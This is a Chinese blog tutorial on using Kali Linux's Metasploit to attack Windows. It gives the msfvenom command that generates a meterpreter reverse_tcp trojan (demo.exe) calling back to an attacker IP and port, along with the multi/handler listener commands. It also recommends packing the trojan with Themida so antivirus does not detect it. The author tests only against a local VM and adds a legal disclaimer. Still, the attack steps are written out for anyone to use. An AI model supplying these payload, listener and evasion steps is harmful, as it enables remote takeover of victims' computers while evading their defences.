网络攻防——kali操作系统基本使用

已于 2022-03-18 18:07:47 修改
阅读量2.5w 收藏 317
点赞数 37
分类专栏: # 网络攻防 文章标签: 网络安全
于 2022-03-07 14:12:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46560512/article/details/123327771
版权

1.阅读前的声明

    本文章中生成的木马带有一定的攻击性,使用时请遵守网络安全相关的法律法规(恶意攻击操作系统属于违法行为)。

2.环境安装

    生成木马主要需要如下工具:kali操作系统,VMware15(搭建kali操作系统环境,防止影响自己的windows系统的正常运行),Themida(免杀加壳工具,防止被电脑或者手机的安全工具查杀)。

2.1VMware15的下载

    VMware15的下载安装,可以参考这个文章:VMware15的下载安装教程

2.2kali操作系统的下载与虚拟机创建

    kali操作系统的下载链接:kali操作系统下载,我们选择VMware,右边的是mac电脑的。
在这里插入图片描述
    迅雷好像快一些,当时使用迅雷加速了一下,下载完成之后的文件如下:
在这里插入图片描述
    需要注意的是这里下载的就是一个虚拟机,直接再VMware里面打开就行了(是打开!),不是镜像文件哦,安装成功结果如下:
在这里插入图片描述

2.3 Themida的下载安装

    Themida的下载安装可以参考这篇文章:Themida的下载
    注:可能你觉得我需要安装教程一步步来说明,卸载环境重装环境,但是这样工作量太大了,可能会占用一些不要的时间,天天教安装也没啥意思,但需要明白一点,装环境是开发很重要的一步,也是入门的最最基础的一步,如果环境不会装,多搜搜就会了,也不用急。

3.利用kali操作系统的metasploit攻击windows操作系统

    正片开始,登录kali操作系统(默认账户名和密码都是:kali),打开终端,输入sudo su(切换到管理员身份,密码还是kali),如下所示:
在这里插入图片描述
接下来依次输入如下指令:

msfconsole init //(初始化metasploit数据库)

    新开一个终端,输入ip address获取虚拟机的ip地址:
在这里插入图片描述
    接下来回到上一个终端,输入如下指令:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.128 lport=9999 -f exe -o demo.exe

    注:-p表示攻击载荷,表示的是说明这个程序需要载入什么功能,这里就是windows/x64/meterpreter/reverse_tcp(开始操作系统的远程连接服务),后面的是远程连接的执行主机和该连接使用的端口,-f表示的生成的文件格式,-o表示的output(生成),demo.exe表示的是生成的文件名称。接下来就可以找到生成的木马程序了:
在这里插入图片描述
在这里插入图片描述
特别说明,可能你在这个地方没有看到生成的文件,这个是因为生成的文件可能在root目录下,有些时候也在kali目录下,所以如果没有的话,直接点击右键,open as Root
在这里插入图片描述

use exploit/multi/handler(使用exploit里面的处理程序模块)
set payload windows/x64/meterpreter/reverse_tcp(设置靶机中开启的服务)
set lhost 192.168.58.128(设置靶机中该服务权限的使用者)
set lport 9999(靶机中连接使用的端口)
run

    程序需要等到靶机的执行即可。
接下来,将虚拟机中的demo.exe放入到windows中,但是,会立马被杀掉:
在这里插入图片描述
    但是对于一个程序而言,杀毒软件也同样是软件,有些软件不能被杀掉是因为有着特殊的加壳处理,保护了程序不被杀掉,常见的就比如Themida。
在这里插入图片描述
    恢复之后需要保证火绒依然能够识别该病毒:
在这里插入图片描述
在这里插入图片描述
    完成之后杀一下生成的保护文件:
在这里插入图片描述

    接下来就是使用病毒程序了,windows执行病毒程序,然后

在这里插入图片描述
    如果给你拍个照或者视频录像,从事非法操作,当然我这里使用的是本机虚拟机,如果使用的是装了kali操作系统的服务器还是有点恐怖的。
    最后,对于英语困难户,可以看看这个汉化教程哦,亲测有效:(kali汉化教程

3.参考文献

(1)kali汉化教程

凌空暗羽
关注
  • 37
    点赞
  • 317
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 22
    评论
专栏目录
kali的新手教程
2201_76048337的博客
06-24 5611
众所周知,黑客不会玩KALI都是假黑客,那么现在我来 教大家KALI的新手教程吧!这里,我盘点了一些KALI常用的代码KALI中的ROOT权限与Windows中的管理员权限类似,进入以后,你的行为成功性会扩大打开KALI 打开终端输入: 接着,输入: 出现以下画面: 按住下键,找到“kali"选项 按”i“键进入插入模式,将参数的两个1000调成0 按Esc键退出插入模式,按shift+两个z保存退出输入reboot重启即可输入: 出现以下画面: 按住下键,找到zh_CN.UTF-8
【2024最新版】超详细Kali安装保姆级教程Kali Linux环境配置和使用指南,看完这一篇就够了
m0_60567881的博客
04-27 1101
本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。GRUB是用来从硬盘中启动一个操作系统的程序,根据提示选择默认的“是”即可。4)再根据提示设置一个域名,比如“abcd.cn”,继续。2)选择语言、接下来的步骤依次选择“中国”->“汉语”
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)从零基础入门到精通,看完这一篇就够了
Libra1313的博客
01-16 1万+
正如刚才所说,kali里集成了大量的黑客工具和网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。本文简单介绍了kali系统,只是适合对没有了解过的新手小白的一个引导关于我笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。网络安全产业就像一个江湖,各色人等聚集。
2024年最新kali Linux安装教程(超详细,图文并茂)
weixin_42340783的博客
04-10 5886
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
【2023最新版】超详细Kali安装保姆级教程Kali Linux环境配置和使用指南,看完这一篇就够了
leah126的博客
01-09 1万+
可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。”时,如果分区方案没有其他问题,应该选择“是”GRUB是用来从硬盘中启动一个操作系统的程序,根据提示选择默认的“是”即可。4)再根据提示设置一个域名,比如“abcd.cn”,继续。2)选择语言、接下来的步骤依次选择“中国”->“汉语”-将空白、休眠、关闭都设为“从不”然后“关闭”即可。提示设置主机名时,可以接受默认的“kali
【渗透测试】kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
kali2022.3基础教学——简单配置与工具初步使用
2201_75308148的博客
02-03 1469
对于kali2022.3基础配置有疑惑的,对于kali不熟悉的伙伴看过来!
Kail Linux使用教程
隐身博客
01-24 451
使用Kali Linux的教程可以分为几个主要部分:熟悉界面、使用基本工具、进行网络安全实践和学习进阶技能。- 官方文档:Kali Linux的[官方文档](https://docs.kali.org/)提供了详细的指南和教程。- 遵循法律和道德规范:在进行任何形式的测试时,确保你有适当的授权,并且遵守相关的法律和道德标准。- 社区和论坛:参与Kali Linux社区和论坛,与其他用户交流经验和学习资源。-网络扫描:使用工具如Nmap进行网络扫描,了解如何发现网络上的设备和服务。
一文通透——Kali Linux基础入门_kali linux 新手教程
bdfcfff77fa的博客
01-25 1376
PS:apt upgrade和dist-upgrade的差别 upgrade升级时,如果软件包有相依性的问题,此软件包就不会被升级。PS:复制粘贴小技巧 1、复制:在kali终端下,使用鼠标选中内容,就可以完成kali下复制, 2、粘贴:移动光标到需要粘贴的位置,按下鼠标中间的滚轮,就可以粘贴。依次进入:左上角==>设置==>电源管理器==>安全性==>自动锁定会话:从不==>当系统进入睡眠状态··· ··· ,去掉那个勾。最后,我其实要给部分人泼冷水,因为说实话,上面讲到的资料包获取没有任何的门槛。
安卓——Kali_linux操作文档.docx
08-20
详细讲解在安卓手机上安装配置kali Linux。
kali系统使用教程
02-12
kali系统使用教程
Kali渗透中文教程
12-31
- ParolaPass Password Generator - Find Host IP - Anonymous HOIC - Ddosim - Pyloris - Slowloris - TorsHammer - Sqlmap - Havij - Sql Poison - Admin Finder - John the Ripper - Hash Identifier - Tor - XChat IRC
kail linux渗透流程
06-03
kail linux 渗透测试过程详细流程图,以xmind文件展示,支持自己修改
网络攻防安全kali Linux漏洞扫描
最新发布
06-18
网络攻防 网络安全 kali Linux 漏洞扫描教程
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali使用手册英文版
06-04
kali linux的使用手册,从系统安装到常见使用方法均有讲述,主要涉及kali linux操作系统,不涉及常见攻防工具的使用
kali简单操作(从入门到入狱)
javaProgrammerr的博客
03-08 4394
nmap 当使用nmap扫描一个端口的时候 PORT: 端口 STATE: 端口状态 SERVICE: 端口服务 open: 端口是开放的 closed: 端口是关闭的 filtered: 端口被防火墙IDS/IPS屏蔽,无法确定状态 open|filtered: 端口是开放的或被过滤 指令写法: nmap IP地址 xhydra 可以利用它来对众多协议进行口令.账号.密码的爆破. 支持FTP,MYSQL,SMTP,TELNET,SSH等众多的协议爆破. 使用方法 在终端中输入命令行xhydra 菜单栏一
kali操作系统优势是什么
09-13
### 回答1: Kali操作系统的优势在于它是一个专门用于渗透测试和网络安全操作系统,内置了大量的安全工具和软件,可以方便地进行安全测试和漏洞扫描。此外,Kali操作系统还支持多种语言和平台,具有高度的可定制性和灵活性。 ### 回答2: Kali操作系统是一个基于Debian的渗透测试和安全评估平台,它具有以下几个方面的优势。 首先,Kali操作系统具有强大的工具集。Kali集成了大量的渗透测试和安全评估工具,包括Metasploit、Nmap、Wireshark等。这些工具都是经过精心挑选和优化的,可以满足各种渗透测试需求。使用Kali操作系统,安全专业人员无需额外安装各种工具,即可方便地进行渗透测试和安全评估工作。 其次,Kali操作系统具有良好的用户体验。Kali操作系统提供了一个直观的用户界面,使得用户能够轻松使用各种工具。它还提供了一些用户友好的特性和快捷键,方便用户进行常见操作。此外,Kali操作系统还具有很好的兼容性,可以在各种硬件上运行,无论是台式机、笔记本还是虚拟机。 此外,Kali操作系统还具备强大的社区支持。Kali操作系统有一个活跃的社区,里面有大量的用户和开发者,他们不断分享经验、交流问题和提供解决方案。这个社区能够提供及时的技术支持和更新,使得Kali操作系统能够保持最新的渗透测试和安全评估工具。 最后,Kali操作系统是免费和开源的。任何人都可以下载、安装和使用Kali操作系统,而且可以自由地修改和分发它。这使得Kali操作系统成为一个广泛使用的渗透测试和安全评估平台,为安全专业人员提供了更多的选择和自由度。 综上所述,Kali操作系统具有强大的工具集、良好的用户体验、强大的社区支持以及免费和开源的优势,使其成为首选的渗透测试和安全评估平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 22
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凌空暗羽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值